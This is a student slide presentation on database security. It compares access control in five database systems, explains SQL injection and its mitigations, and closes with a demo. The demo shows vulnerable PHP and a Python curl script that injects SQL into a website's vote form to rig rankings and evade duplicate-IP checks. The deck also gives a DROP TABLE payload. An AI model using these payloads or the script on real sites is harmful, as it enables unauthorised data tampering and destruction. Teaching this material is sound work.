Database Security

1
Database Security

• Types of attacks and mitigation strategies

Group Members Tushar Sugandhi Natthapol
Prakongpan Travis Whilden Brendan Kohlar Jonathan
Reitnauer
2
Database Access Control

• Part I

3
Review Databases

• IBM DB2
• Oracle
• Microsoft SQL Server
• MySQL
• PostgreSQL

4
Security Mechanisms

• Authentication
• Who is allowed access to the instance and/or
  database
• Where and how a user's password will be verified
• Authorization
• The authority level that a user is granted
• The commands that a user is allowed to run
• The data that a user is allowed to read and/or
  alter
• The database objects a user is allowed to create,
  alter, and/or drop
• Privileges
• Granular authorization

5
IBM DB2 Authentication

• Works closely with the security features of the
  underlying operating system to verify user IDs
  and passwords.
• Can use Kerberos to authenticate users.

6
IBM DB2 Authorization

• Determine the operations that users and/or groups
  can perform.
• Determine the data objects that users can access.
• Five authority levels
• SYSADM
• SYSCTRL
• SYSMAINT
• DBADM
• LOAD

7
IBM DB2 Privileges

• More granular then authorities.
• Can be assigned to users and/or groups.
• Help define the objects that a user can create or
  drop.
• Help define the commands that a user can use to
  access objects (tables, views, indexes, packages).

8
Oracle Security

• Authentication (Identity Management)
• Virtual Private Database
• Oracle Label Security
• Row Level Authentication

9
Oracle Identity Management

• LDAP Directory Service
• Directory integration and provision services
• Authentication and authorization services
• Certificate authority (CA)

10
Oracle Virtual Private Database

• Allow policy to be associated with specific
  columns in tables.
• Relevant Column and Masking

11
Oracle Label Security

• Provides a secure engine and data dictionary for
  managing access to data using sensitivity label.
• Row level security can be achieved with no
  programming required.
• Sensitivity labels are used to determine users
  ability to view and update data.

12
Oracle Label Security
13
Microsoft SQL Server

• Authentication
• Access Permission
• Roles

14
MS SQL Authentication

• Two methods for user authentication
• Windows authentication
• Default and preferred
• Secure authentication with underlying operating
  system
• SQL Server authentication
• Strongly discourage
• Not as secure (Clear text password)

15
MS SQL Access Permission

• Statement Permissions

16
MS SQL Access Permission

• Object Permissions

17
MS SQL Roles
18
(No Transcript)
19
(No Transcript)
20
MySQL

• Limited Security Features
• Authentication
• Permission

21
MySQL Authentication

• User table/grant table in master database.
• Stored in plaintext.
• Can be view by anyone if not configured properly.
• No ties to OS.
• MySQLs root has no password by default.

22
MySQL Permission

• Table level control
• Column level control
• No row level control

23
(No Transcript)
24
Postgre SQL Authentication

• Trust Authentication
• OS-based
• Password Authentication
• md5, crypt, or password through a user table
• Kerberos Authentication
• Kerberos auth. server
• Ident-based Authentication
• Username, password, machine, OS.
• Pluggable Authentication Module (PAM)
• Custom authentication method.

25
Postgre SQL Permission

• Read
• SELECT
• Append
• INSERT
• Write
• UPDATE/DELETE
• Rules
• Allows a user to modify permission on a database.
• Super user

26
(No Transcript)
27
(No Transcript)
28
Features Comparison
29
SQL INJECTION ATTACKS
Part II

• THE BASICS

30
What is SQL Injection?

• A security vulnerability exploiting the
  application layer of the database
• Improperly handled user input injected into DBMS
  as SQL statements

31
Where is it Done?

• Potentially any field requiring user input!
• Attacking either the user handle or password in
  login authentication is most commonly associated
  location of SQL Injection

32
Specifically

• SQL Injection attacks can be broken down into the
  exploitation of two vulnerabilities
• Improper removal of escape characters
• Weak type enforcement

33
VulnerabilityEscape Characters

• When escape characters used in SQL query/command
  are not properly filtered from user input
• Triggers an escape sequence from the current
  query, such as setting a dummy value equal to
  itself
• The statement X X is always true

34
Example Escape Characters Exploit

• Application prompts user for userName
• statement "SELECT FROM users WHERE name '"
  userName "'
• User injects partial SQL code into prompt
• a' or 't''t
• statement becomes
• SELECT FROM users WHERE name 'a' or 't''t'
• Or condition always returns true

35
VulnerabilityWeak Type Enforcement

• When type constraints are not properly
  implemented for user input
• Malicious user injects a data type for input that
  was not an intended value

36
ExampleWeak Type Enforcement Exploit

• Application prompts user for numeric value for
  row selection for following code
• statement "SELECT FROM data WHERE id "
  a_variable "
• User injects string statement into prompt
• 1DROP TABLE users
• statement becomes
• SELECT FROM data WHERE id 1DROP TABLE users
  
• Execution deletes users table from database

37
Protection From Attack

• Sanitize the data
• Secure the application
• Safeguard the input
• Use stored procedures

38
ProtectionSanitize the Data

• More than simply adding backslashes!
• Need a default-deny regular expression to filter
  through only desired characters
• s/0-9a-zA-Z//\ returns only alphanumeric
  values
• Strip quotation marks

39
ProtectionSecure the Application

• People are the weakest link
• Limit access to only those who need it!
• Set each individuals access to lowest required
  permissions

40
ProtectionSafeguard the Input

• Check your database interface for input handling
  functions
• Proper quote handling in string parsing
• Deal with backslashes accordingly

41
ProtectionUse Stored Procedures

• A viable alternative
• Resolves issues with dynamic input
• Tailored to the specific needs of the database

42
DEMO
Part III
43
SQL Injection Demo

• Attack a real website using SQL injection

44
SQL Injection Demo

• Bestthing.info Comparing apples to oranges and
  oranges to racecars.
• User-driven content with database backend
• Quest to find the best thing ever
• Mirror of the site at injection.pycoder.net

45
(No Transcript)
46
(No Transcript)
47
Plan of attack

• Put a phrase at the top of the Best phrases
• Must get around the protection against duplicate
  ip addresses.

48
Site Code
HTML ltform method"post" action"/"gt ltdivgt
ltinput name"tid0" value"27356" type"hidden"
/gt ltinput name"tid1" value"35705"
type"hidden" /gt ltinput name"A"
type"submit" value"Having a funny hat" /gt or
ltinput name"B" type"submit" value"Bs" /gt
ltbr /gtltbr /gt ltinput type"submit" name"d"
value"Report this pair as a duplicate." /gt
lt/divgt lt/formgt
PHP mysql_query('INSERT INTO votes
(ip,time,tid0,tid1,vote) VALUES
('.ip2long(_SERVER'REMOTE_ADDR').',now(),'._PO
ST'tid0'.','._POST'tid1'.','.(isset(_POST'A
')?10).')') if(mysql_affected_rows()gt0)
mysql_query('UPDATE thing SET votesForvotesFor'.
forA.', votesTotalvotesTotal1 WHERE
tid'.o) mysql_query('UPDATE thing SET
votesForvotesFor'.(forA?01).',
votesTotalvotesTotal1 WHERE tid'.t)
49
Attack Code
Python Script !/usr/bin/python import random,
commands x random.randint(4000,400000) for n
in range(600) while True p
random.randint(4000,400000) If not p in x
x.append(p) break
commands.getoutput((r"curl -d tid0i,i,1\)\
-d tid1-1\ or\ rthing\'test\' -d
Bsubmit rhttp//injection.pycoder.net
" ) (x-2,x-1))
50
(No Transcript)
51
Thank you !!!